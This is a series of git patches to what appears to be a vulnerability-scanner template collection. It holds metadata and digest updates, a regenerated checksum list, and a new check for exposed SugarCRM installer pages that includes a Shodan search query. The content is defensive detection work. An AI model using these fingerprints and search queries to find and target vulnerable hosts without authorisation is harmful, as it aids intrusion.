"{{BaseURL}}/wp-content/plugins/wp-user-avatar/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022054ac90fb26aa6f369a58942693dc48f31db219078777954296a7d508fd4e26f0022100ad83bfe2cf4dc9434633cc18f4ee0330c59bafa4290320bef769d2f41a40ed60:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022054ac90fb26aa6f369a58942693dc48f31db219078777954296a7d508fd4e26f0022100ad83bfe2cf4dc9434633cc18f4ee0330c59bafa4290320bef769d2f41a40ed60:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index 6f4832b807..276659dfcc 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/wpcf7-recaptcha/ metadata: + max-request: 1 plugin_namespace: wpcf7-recaptcha wpscan: https://wpscan.com/plugin/wpcf7-recaptcha tags: tech,wordpress,wp-plugin,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/wpcf7-recaptcha/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100dee5a0855f1ef59945db83b0b5a136d72b1f8c487617f4367e1f054b71db297a02202128246e0cd5a30d9a2340c6a6911e64c38e65864d152711dc7c183b4e619368:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100dee5a0855f1ef59945db83b0b5a136d72b1f8c487617f4367e1f054b71db297a02202128246e0cd5a30d9a2340c6a6911e64c38e65864d152711dc7c183b4e619368:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index 1e6351c2c5..ba4fc36453 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/wpcf7-redirect/ metadata: + max-request: 1 plugin_namespace: wpcf7-redirect wpscan: https://wpscan.com/plugin/wpcf7-redirect tags: tech,wordpress,wp-plugin,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/wpcf7-redirect/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008e0ed857afe7606ef34fabf0ffa7fff81b1e99f4f4e0a1ea516bd1ab49a05ca5022100e997a153d46ddff6d35a2391cf090310f86af18a527d62363a24f6746671c76e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a004830460221008e0ed857afe7606ef34fabf0ffa7fff81b1e99f4f4e0a1ea516bd1ab49a05ca5022100e997a153d46ddff6d35a2391cf090310f86af18a527d62363a24f6746671c76e:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index 033cce6c90..24b9fa1e74 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/wpforms-lite/ metadata: + max-request: 1 plugin_namespace: wpforms-lite wpscan: https://wpscan.com/plugin/wpforms-lite tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/wpforms-lite/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203c88b61d84061aaadbde628ab67e0dc54d95681d61d3f8a98d129d0f8943a36e022100be7e0afbfc9a41ed8c29906472ee387354992cc64192c092d02429a98fad27fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502203c88b61d84061aaadbde628ab67e0dc54d95681d61d3f8a98d129d0f8943a36e022100be7e0afbfc9a41ed8c29906472ee387354992cc64192c092d02429a98fad27fb:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index 3aa20a3c35..c9a450b47f 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/wps-hide-login/ metadata: + max-request: 1 plugin_namespace: wps-hide-login wpscan: https://wpscan.com/plugin/wps-hide-login tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/wps-hide-login/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022008297cf68cb109e905c7b9fefb1da19652baf0d99c42804334b4da139197b9f20220137e5bda1fa9c94eedf48fc8e5a5a3a5391b23db83b6fb5f17d2c4e11fa7d456:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022008297cf68cb109e905c7b9fefb1da19652baf0d99c42804334b4da139197b9f20220137e5bda1fa9c94eedf48fc8e5a5a3a5391b23db83b6fb5f17d2c4e11fa7d456:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index d0f3504cbb..8b40c9d62a 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/wpvivid-backuprestore/ metadata: + max-request: 1 plugin_namespace: wpvivid-backuprestore wpscan: https://wpscan.com/plugin/wpvivid-backuprestore tags: tech,wordpress,wp-plugin,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/wpvivid-backuprestore/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022058fbee65c6a1c468646c541a0fa988c2610023923bbd3d075c26a9593446dac902206cbd84316cf6e6bb3140e74b1c61077217f4b11bf5a238f342988ccdf0851fc2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022058fbee65c6a1c468646c541a0fa988c2610023923bbd3d075c26a9593446dac902206cbd84316cf6e6bb3140e74b1c61077217f4b11bf5a238f342988ccdf0851fc2:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index 6305600855..dfeb4df0e4 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/yith-woocommerce-wishlist/ metadata: + max-request: 1 plugin_namespace: yith-woocommerce-wishlist wpscan: https://wpscan.com/plugin/yith-woocommerce-wishlist tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/yith-woocommerce-wishlist/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202668b69b39777fed3d1f72691e1c988e1bce096c70300bf5c338127cad198a9d022100a0a749d5c49dabdb2f0faee24685ea86321cf8b1ba2cdb9d03cc3d8d69220f09:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502202668b69b39777fed3d1f72691e1c988e1bce096c70300bf5c338127cad198a9d022100a0a749d5c49dabdb2f0faee24685ea86321cf8b1ba2cdb9d03cc3d8d69220f09:922c64590222798bb761d5b6d8e72950 diff --git a/http/vulnerabilities/apache/apache-druid-kafka-connect-rce.yaml b/http/vulnerabilities/apache/apache-druid-kafka-connect-rce.yaml index dd14ed9e47..089694aca5 100644 --- a/http/vulnerabilities/apache/apache-druid-kafka-connect-rce.yaml +++ b/http/vulnerabilities/apache/apache-druid-kafka-connect-rce.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-25194 cwe-id: CWE-502 epss-score: 0.91098 - epss-percentile: 0.9854 + epss-percentile: 0.98541 cpe: cpe:2.3:a:apache:kafka_connect:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/network/cves/2022/CVE-2022-31793.yaml b/network/cves/2022/CVE-2022-31793.yaml index df1513fa3e..3503da1a4e 100644 --- a/network/cves/2022/CVE-2022-31793.yaml +++ b/network/cves/2022/CVE-2022-31793.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-31793 cwe-id: CWE-22 epss-score: 0.22965 - epss-percentile: 0.9599 + epss-percentile: 0.95993 cpe: cpe:2.3:a:inglorion:muhttpd:*:*:*:*:*:*:*:* metadata: verified: true From d45e9fd57a06635cd6f4f3de1b22d4d06b039cf7 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 3 Nov 2023 11:00:56 +0000 Subject: [PATCH 24/36] Auto Template Signing [Fri Nov 3 11:00:56 UTC 2023] :robot: --- http/vulnerabilities/other/ecology-oa-file-sqli.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/http/vulnerabilities/other/ecology-oa-file-sqli.yaml b/http/vulnerabilities/other/ecology-oa-file-sqli.yaml index 25dff24550..a7e2113cc4 100644 --- a/http/vulnerabilities/other/ecology-oa-file-sqli.yaml +++ b/http/vulnerabilities/other/ecology-oa-file-sqli.yaml @@ -39,5 +39,4 @@ http: - 'duration_2>=15 && status_code_2 == 200' - 'contains(header_2, "ecology_JSessionid=")' condition: and - -# digest: 4a0a004730450220706de22bcda877d015e3158b4912359fceab8b5c6888f625675921c48ebf595f022100baf7463de1956ebc43063ae318c3e1e9b4ee0e96dc1652136e8c0b3c68ae1978:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220596edd2349df4768ede6899a51ac91ab751b3f9a1f0a6387c328ab0a4d371d91022100dfc4ae8081c42434d2872c3dcd68aa37d6bc8167d7e9619d815446d5532fc704:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 5c90a36568132e708560ed0410711602568d474a Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 3 Nov 2023 11:07:08 +0000 Subject: [PATCH 25/36] TemplateMan Update [Fri Nov 3 11:07:08 UTC 2023] :robot: --- http/cves/2021/CVE-2021-27358.yaml | 2 +- http/cves/2023/CVE-2023-0630.yaml | 2 +- http/cves/2023/CVE-2023-33629.yaml | 3 ++- http/cves/2023/CVE-2023-37728.yaml | 2 +- 4 files changed, 5 insertions(+), 4 deletions(-) diff --git a/http/cves/2021/CVE-2021-27358.yaml b/http/cves/2021/CVE-2021-27358.yaml index da3c7cda63..8180753686 100644 --- a/http/cves/2021/CVE-2021-27358.yaml +++ b/http/cves/2021/CVE-2021-27358.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-27358 cwe-id: CWE-306 epss-score: 0.02641 - epss-percentile: 0.89211 + epss-percentile: 0.89218 cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2023/CVE-2023-0630.yaml b/http/cves/2023/CVE-2023-0630.yaml index e1899a3502..734b33e098 100644 --- a/http/cves/2023/CVE-2023-0630.yaml +++ b/http/cves/2023/CVE-2023-0630.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-0630 cwe-id: CWE-89 epss-score: 0.0691 - epss-percentile: 0.93173 + epss-percentile: 0.93176 cpe: cpe:2.3:a:wp-slimstat:slimstat_analytics:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-33629.yaml b/http/cves/2023/CVE-2023-33629.yaml index 39655303df..92fe956b4a 100644 --- a/http/cves/2023/CVE-2023-33629.yaml +++ b/http/cves/2023/CVE-2023-33629.yaml @@ -46,4 +46,5 @@ http: - status_code_2 == 200 - contains_all(body_2, 'www', 'www_multi') condition: and -# digest: 4a0a00473045022100db94e1fe397ec05484776a74d461a3e880e96490a66eae98dfbec0e3228ba8d402204c7f02417a8fa4a69743cae52639d07e90359df81065d0e4e9aadf828fc4fa50:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100db94e1fe397ec05484776a74d461a3e880e96490a66eae98dfbec0e3228ba8d402204c7f02417a8fa4a69743cae52639d07e90359df81065d0e4e9aadf828fc4fa50:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2023/CVE-2023-37728.yaml b/http/cves/2023/CVE-2023-37728.yaml index 5171edbf38..e6b96491fb 100644 --- a/http/cves/2023/CVE-2023-37728.yaml +++ b/http/cves/2023/CVE-2023-37728.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-37728 cwe-id: CWE-79 epss-score: 0.00081 - epss-percentile: 0.33914 + epss-percentile: 0.33926 cpe: cpe:2.3:a:icewarp:icewarp:10.2.1:*:*:*:*:*:*:* metadata: verified: true From ce324042a65a261ab06b5a64378dfbb38ce8f246 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 3 Nov 2023 11:08:00 +0000 Subject: [PATCH 26/36] TemplateMan Update [Fri Nov 3 11:08:00 UTC 2023] :robot: --- http/vulnerabilities/other/ecology-oa-file-sqli.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/vulnerabilities/other/ecology-oa-file-sqli.yaml b/http/vulnerabilities/other/ecology-oa-file-sqli.yaml index a7e2113cc4..bf41fe2b43 100644 --- a/http/vulnerabilities/other/ecology-oa-file-sqli.yaml +++ b/http/vulnerabilities/other/ecology-oa-file-sqli.yaml @@ -10,7 +10,7 @@ info: - https://github.com/TgHook/Vulnerability-Wiki/blob/master/docs-base/docs/oa/%E6%B3%9B%E5%BE%AEOA%20e-cology%20FileDownloadForOutDoc%E5%89%8D%E5%8F%B0SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md metadata: verified: true - max-request: 1 + max-request: 2 shodan-query: ecology_JSessionid fofa-query: app="泛微-协同办公OA" tags: ecology,ecology-oa,sqli From fcfe5c89a32676a55188a05ca51ecb89f231efe4 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 3 Nov 2023 20:36:05 +0530 Subject: [PATCH 27/36] Create sugarcrm-install.yaml --- .../installer/sugarcrm-install.yaml | 26 +++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 http/misconfiguration/installer/sugarcrm-install.yaml diff --git a/http/misconfiguration/installer/sugarcrm-install.yaml b/http/misconfiguration/installer/sugarcrm-install.yaml new file mode 100644 index 0000000000..dbd347e0de --- /dev/null +++ b/http/misconfiguration/installer/sugarcrm-install.yaml @@ -0,0 +1,26 @@ +id: sugarcrm-install + +info: + name: SugarCRM Exposed Installation + author: ritikchaddha + severity: high + metadata: + verified: true + shodan-query: title:"Sugar Setup Wizard" + tags: misconfig,sugar,sugarcrm,install + +http: + - method: GET + path: + - "{{BaseURL}}/install.php" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Sugar Setup Wizard" + + - type: status + status: + - 200 From b49e496a4c16f3239083ba4cec3b5cc34d3d8bcc Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Fri, 3 Nov 2023 15:13:45 +0000 Subject: [PATCH 28/36] Auto Generated New Template Addition List [Fri Nov 3 15:13:45 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 7398ff8454..af065426a6 100644 --- a/.new-additions +++ b/.new-additions @@ -15,6 +15,7 @@ http/misconfiguration/installer/cube-105-install.yaml http/misconfiguration/installer/orangescrum-install.yaml http/misconfiguration/installer/ruckus-smartzone-install.yaml http/misconfiguration/installer/ruckus-unleashed-install.yaml +http/misconfiguration/installer/sugarcrm-install.yaml http/misconfiguration/installer/tautulli-install.yaml http/misconfiguration/installer/webcalendar-install.yaml http/misconfiguration/installer/webtrees-install.yaml From 23960043d83a3a7c0b8710151a62806e6ec134a4 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Fri, 3 Nov 2023 15:13:52 +0000 Subject: [PATCH 29/36] Auto Generated Templates Checksum [Fri Nov 3 15:13:52 UTC 2023] :robot: --- templates-checksum.txt | 4341 ++++++++++++++++++++-------------------- 1 file changed, 2171 insertions(+), 2170 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 385c17b88d..68fc8d6072 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -628,2200 +628,2200 @@ http/credential-stuffing/cloud/pulmi-login-check.yaml:b360401b724799237fbd4b0b00 http/credential-stuffing/self-hosted/gitlab-login-check-self-hosted.yaml:a74d469cb194be475eaea82cfe2dc753efe638fb http/credential-stuffing/self-hosted/grafana-login-check.yaml:8f5793e273b313b8fdc6ef9a28efef7786fe4802 http/credential-stuffing/self-hosted/jira-login-check.yaml:cccab91229b3c826d50f35b9d6b3a52755417602 -http/cves/2000/CVE-2000-0114.yaml:544e72ed69c15d72d8625e5693bccdfe5d08bcb8 -http/cves/2001/CVE-2001-0537.yaml:15b713a7db71528c7d4b4a48293905a553be21e7 -http/cves/2002/CVE-2002-1131.yaml:7706683e7abd605da801d9a72081e0eeaa02ecb5 -http/cves/2004/CVE-2004-0519.yaml:b6146396a73e984c04390d257b308f8bc629d6e7 -http/cves/2004/CVE-2004-1965.yaml:bd83c477317ef9f5a70880c08733f340577275de -http/cves/2005/CVE-2005-2428.yaml:5eec40e24e07b118289b26fadcb61eed64b86920 -http/cves/2005/CVE-2005-3344.yaml:6bb8d99a4dcc8c290a06db2a53e1bbe4e352b34f -http/cves/2005/CVE-2005-3634.yaml:a764a898b7d4ba9595494cfa62a274232dd846ba -http/cves/2005/CVE-2005-4385.yaml:8d53e0e3e1363fa327f4289950f09f39e63629fd -http/cves/2006/CVE-2006-1681.yaml:411abf2ac3bec2fc95624217713ef1e05c538dca -http/cves/2006/CVE-2006-2842.yaml:206ec4945ab13b5f9d7824dd98d5ce71ed8eacc6 -http/cves/2007/CVE-2007-0885.yaml:21e7d7eb500dfcdc264e837151fe14b7760d407d -http/cves/2007/CVE-2007-4504.yaml:b4388391b58085f9d1768bfd13e008be53dca810 -http/cves/2007/CVE-2007-4556.yaml:aec7b8819666962769617c92200905d9bf7974c3 -http/cves/2007/CVE-2007-5728.yaml:5064009cfdd9ae9b0e67fe854dc3c1229efeea02 -http/cves/2008/CVE-2008-1059.yaml:a9f2ae529710bea357edbd4668f47dbf2d0cd0ab -http/cves/2008/CVE-2008-1061.yaml:fc6c4c7f40e37b84cbb85c0b6dac9f95d89b7707 -http/cves/2008/CVE-2008-1547.yaml:b724622eeb32e3c05fe012cccdf29ac16d1d75a7 -http/cves/2008/CVE-2008-2398.yaml:b8534739f8b3646202a898bb907a191e945bdc0b -http/cves/2008/CVE-2008-2650.yaml:7dc51551fadeda2e28e1078e4596e4eda1468740 -http/cves/2008/CVE-2008-4668.yaml:f7d56026194c0335d43c4526c215d75c99749b07 -http/cves/2008/CVE-2008-4764.yaml:92f42412d5b350c0ea9aa85b66cfbe61765188e0 -http/cves/2008/CVE-2008-5587.yaml:84e92938db11432f346516114b650ea84bf53268 -http/cves/2008/CVE-2008-6080.yaml:e7c5f29e558ab53730e6523bfc047d39ff236a96 -http/cves/2008/CVE-2008-6172.yaml:c4d7297224af78d527fa7e7229087b81da908b59 -http/cves/2008/CVE-2008-6222.yaml:4fdba61bb38494afbae98167b7039e656a8bff1b -http/cves/2008/CVE-2008-6465.yaml:b2ae7f1f4e3a6e4c63bfe8a70eac03db52bce856 -http/cves/2008/CVE-2008-6668.yaml:39f7e90bcfd292e95f93c8c5080795f092468cce -http/cves/2008/CVE-2008-6982.yaml:05ebf23d3415e88c8de0710088a5544eb7b9bd1f -http/cves/2008/CVE-2008-7269.yaml:2a0d1adcd0d18283d99cf18ea5dadb5755d36ff6 -http/cves/2009/CVE-2009-0347.yaml:23f6b17801694333d049c15f7d8c7b5e3370fa29 +http/cves/2000/CVE-2000-0114.yaml:bfb2c3d026d7699a2e8a3a3e0b0b57ed2cd46a11 +http/cves/2001/CVE-2001-0537.yaml:4bbf6cc03d470256807d695af2a89cdc4633e0b5 +http/cves/2002/CVE-2002-1131.yaml:01a386c963acfcdc1770e2a55a3c8cb27b66ceab +http/cves/2004/CVE-2004-0519.yaml:f4cda6d6a5f53ff6ef5a61b5190e0bc7bdf0edb9 +http/cves/2004/CVE-2004-1965.yaml:6a505177df3dba34fb4ab73be878c991a9314310 +http/cves/2005/CVE-2005-2428.yaml:fcad2910a1f02c09ddf69693af3beeb90e451d3c +http/cves/2005/CVE-2005-3344.yaml:9496add62684b558a3c8ff84d11365261e8fd206 +http/cves/2005/CVE-2005-3634.yaml:b65e2dd47414c93238237f525a3686a3e7b32c08 +http/cves/2005/CVE-2005-4385.yaml:3c98650ca47913b5f24ffef30846c82dd67dd20b +http/cves/2006/CVE-2006-1681.yaml:fff07a2d29835e6a4d3fa21476a89afa9455def1 +http/cves/2006/CVE-2006-2842.yaml:5c9a7032c38f58a43b4d604479227a105a47454c +http/cves/2007/CVE-2007-0885.yaml:5b640a4771cf9e579a37f8e669ddb0c33991cb92 +http/cves/2007/CVE-2007-4504.yaml:16d976a5f5dfc675c87fec1ca1e5361b61f041d6 +http/cves/2007/CVE-2007-4556.yaml:56f654211b62cb2726017867c0a18c85aadc5354 +http/cves/2007/CVE-2007-5728.yaml:b48556b35ed976c27197378f668436b8c491a6e0 +http/cves/2008/CVE-2008-1059.yaml:546955f4e073dc0d65cec49c98df5d7becc34ff2 +http/cves/2008/CVE-2008-1061.yaml:7bef4a2f7f5863a72c35b419ac64d06b4d178429 +http/cves/2008/CVE-2008-1547.yaml:10aa5c0a03cd21d740b403005655593d4f9efe30 +http/cves/2008/CVE-2008-2398.yaml:48c4e9f50eaac21b2e7ae4663261a56e2e61ca7e +http/cves/2008/CVE-2008-2650.yaml:0424d322bbada8805b81d6ad3f84b37032a8bb2c +http/cves/2008/CVE-2008-4668.yaml:affab51aaed5f6a49b80c39faa2838f8999071f8 +http/cves/2008/CVE-2008-4764.yaml:e04631ec326b5f2d0ac712655ec9711f9962e0ee +http/cves/2008/CVE-2008-5587.yaml:8b20ce29ed86f9d955fb90e51395c07a30ba67bf +http/cves/2008/CVE-2008-6080.yaml:8f67169071c324c3c6bdb2ec63646b82bec16b89 +http/cves/2008/CVE-2008-6172.yaml:9cf3f043f1b938318ebd051e461cc33b65aa6cc1 +http/cves/2008/CVE-2008-6222.yaml:37f2986ea203a35d62fe519af9a367749978b457 +http/cves/2008/CVE-2008-6465.yaml:044b9d6ecd8649738d3c3be2f1293fb177f81a08 +http/cves/2008/CVE-2008-6668.yaml:557ee51dcd689b2d5e9598fdcc6c4a2b9da92709 +http/cves/2008/CVE-2008-6982.yaml:94e602bb0038ddab2894789e1f9c200271110f95 +http/cves/2008/CVE-2008-7269.yaml:f64677496ad1e7993164bed583cbe77bd67cb700 +http/cves/2009/CVE-2009-0347.yaml:ca428fe504c7f1ccc6f29879bcf2ab39e9e8e564 http/cves/2009/CVE-2009-0545.yaml:b36aafdb98fad8f1be9221bbb2cb22c5feb4cc8a -http/cves/2009/CVE-2009-0932.yaml:bac5dca06fafcf52df3c26fc402bc79b83abaad1 -http/cves/2009/CVE-2009-1151.yaml:50c1683e46bed9884858df98945c4c4f30d62318 -http/cves/2009/CVE-2009-1496.yaml:c568e6159cbda1b82ef30c96b81622d0737e28c4 -http/cves/2009/CVE-2009-1558.yaml:53a6cab8a9f9424e74707b25a41f84598348dc59 -http/cves/2009/CVE-2009-1872.yaml:0b34239ba7f017b730af26372329cebc849836d5 -http/cves/2009/CVE-2009-2015.yaml:2fc36d9156c2f53d498343398860956098d06422 -http/cves/2009/CVE-2009-2100.yaml:60d9bac8e2a5bbe6a2b03d20d808f4cc227af2dc -http/cves/2009/CVE-2009-3053.yaml:68b34c33591d6b66729736836f24eecc2a9bd9b3 -http/cves/2009/CVE-2009-3318.yaml:0d5edfaa2f8d22839a1494822074fde49890ad1a -http/cves/2009/CVE-2009-4202.yaml:b71c11f284b93e2b2c9ae0a7cf78989e3b26c13d -http/cves/2009/CVE-2009-4223.yaml:cf37e3d07ba9da00c82e0683efa7135d02fa26a8 -http/cves/2009/CVE-2009-4679.yaml:641b5e8cef6d9147745a84164a0c24f086bcfc22 -http/cves/2009/CVE-2009-5020.yaml:960845b980ffb7241161c0c2994dd02ae684af70 -http/cves/2009/CVE-2009-5114.yaml:a06b7792d6a9224ffd3849da9cc9095644fe625b -http/cves/2010/CVE-2010-0157.yaml:571dc86df0c853c808681ef0793afd391ec3e76b -http/cves/2010/CVE-2010-0219.yaml:54945aacd231f30aff9dd7336ab98442b5490612 -http/cves/2010/CVE-2010-0467.yaml:f429fa7c4971e2997d2fd7f2b4d8eec861fbb051 -http/cves/2010/CVE-2010-0696.yaml:72e376dd2e2721e5a95600fed7b8ffdff8d22c70 -http/cves/2010/CVE-2010-0759.yaml:2b94ae2683785e2cd5132cc3fa5373c5ba1a0d29 -http/cves/2010/CVE-2010-0942.yaml:de85ba1451b0203b456931c9d0cff68cc768ccbd -http/cves/2010/CVE-2010-0943.yaml:14360472c4408f9116667bad27f28f1850164fb6 -http/cves/2010/CVE-2010-0944.yaml:1cd0b43680d42f228b639a5de13bb67074bf1e17 -http/cves/2010/CVE-2010-0972.yaml:12075fe21bdd642f1c9541c5aeb132216b80dea5 -http/cves/2010/CVE-2010-0982.yaml:16f5beedadb506f635169fda57aaca5491bcf6af -http/cves/2010/CVE-2010-0985.yaml:0415bc0b1b491ac00f8c2353944de88b35a6cfea -http/cves/2010/CVE-2010-1056.yaml:4c9ffecbe14198e7728768a3639721df68bb0524 -http/cves/2010/CVE-2010-1081.yaml:8f4bf66cbd7e3f5cc9d3e806dc9e01029485613e -http/cves/2010/CVE-2010-1217.yaml:ec8c85d5e7cc67f511e43b5980f502164470dea9 -http/cves/2010/CVE-2010-1219.yaml:013acb4d297230f42c20bc1bf0e283b275a1ea74 -http/cves/2010/CVE-2010-1302.yaml:f9e79629e5f8fea4358b04020b0d81c11b320fed -http/cves/2010/CVE-2010-1304.yaml:c09ad0a73e0102a0f13cd54a34a0c31becd0f4bc -http/cves/2010/CVE-2010-1305.yaml:d8ca48a4d90adc6af4b105b76b411d58649135f6 -http/cves/2010/CVE-2010-1306.yaml:8b676cb4db85fa7c5ec4180db3beb51288625fde -http/cves/2010/CVE-2010-1307.yaml:6e161d24140886d12dc51ad91db4e37d5de54b1d -http/cves/2010/CVE-2010-1308.yaml:275f7e8f8d12b3784dc628942a48d024a10b892f -http/cves/2010/CVE-2010-1312.yaml:37903ff7b24cb33b98a3313dabb51304fdecd729 -http/cves/2010/CVE-2010-1313.yaml:02236f8a1bb6c1eda417f61a23b6666bd9cb8aaf -http/cves/2010/CVE-2010-1314.yaml:39e9ed71666f103ba0ebfe2e7a6a2201ed9bc449 -http/cves/2010/CVE-2010-1315.yaml:df49b578ee55d7f7ce1b69cd166d35205ae0bfe1 -http/cves/2010/CVE-2010-1340.yaml:5f911747c8fefeb7e12d529f905d7419c59461b4 -http/cves/2010/CVE-2010-1345.yaml:747ee27d805cde19ddbd3208b74ae9968cf5e7e3 -http/cves/2010/CVE-2010-1352.yaml:c74f5c3af48ffbbe2e3cede8679ea608366df8b9 -http/cves/2010/CVE-2010-1353.yaml:159b7689eb0d5fe45677f1ce8cdfb8f5c1d6de43 -http/cves/2010/CVE-2010-1354.yaml:7fde6baf96feeb0378efd0a9fd1afd751b40be29 -http/cves/2010/CVE-2010-1429.yaml:6ca284ac5f9cd9e671ac79fc42e2f9227242f1fd -http/cves/2010/CVE-2010-1461.yaml:9efc741142d220c32a192040f84e1b4b037bbeaa -http/cves/2010/CVE-2010-1469.yaml:c0a828fe62219e36b18fd8ebe66ed6770f31ec36 -http/cves/2010/CVE-2010-1470.yaml:d84933cef3f877074cc40bc602a2bbea6e86cb63 -http/cves/2010/CVE-2010-1471.yaml:bc04bd2d00b5bd8e253f5fc64d76c3db24360a47 -http/cves/2010/CVE-2010-1472.yaml:a8d34803ccd8397b16b1b8d0990ada55daa08a7f -http/cves/2010/CVE-2010-1473.yaml:65c37da52f5d4b13b5999eae3b03b887240ab4ea -http/cves/2010/CVE-2010-1474.yaml:2e3becdb107cfa7bccd4b764ef5f656e6da748d3 -http/cves/2010/CVE-2010-1475.yaml:726d0fdfa423f173ef1f4bae73991fe22628edf3 -http/cves/2010/CVE-2010-1476.yaml:9d91d5bc38dbc1fa0fc713acc7669ca499ea8579 -http/cves/2010/CVE-2010-1478.yaml:7cd091ec0dc49fe0a463095b3acb2e63bdec5a3b -http/cves/2010/CVE-2010-1491.yaml:2fb04dae9f3ee21866e620ff97779c4f47e8c63f -http/cves/2010/CVE-2010-1494.yaml:f395d20d65934476a3af2c35647535fcdcce7c64 -http/cves/2010/CVE-2010-1495.yaml:c647947e2ef3071dc54d8ee8a3a5aea10e787c37 -http/cves/2010/CVE-2010-1531.yaml:00916334a13bbba16a969ee4528e63b7704dacf8 -http/cves/2010/CVE-2010-1532.yaml:aa0c6ceac31d89cc4f76d5a1f7ab25117959ea84 -http/cves/2010/CVE-2010-1533.yaml:e540484833e5c9c3dd6923b48c3aab1067b8b811 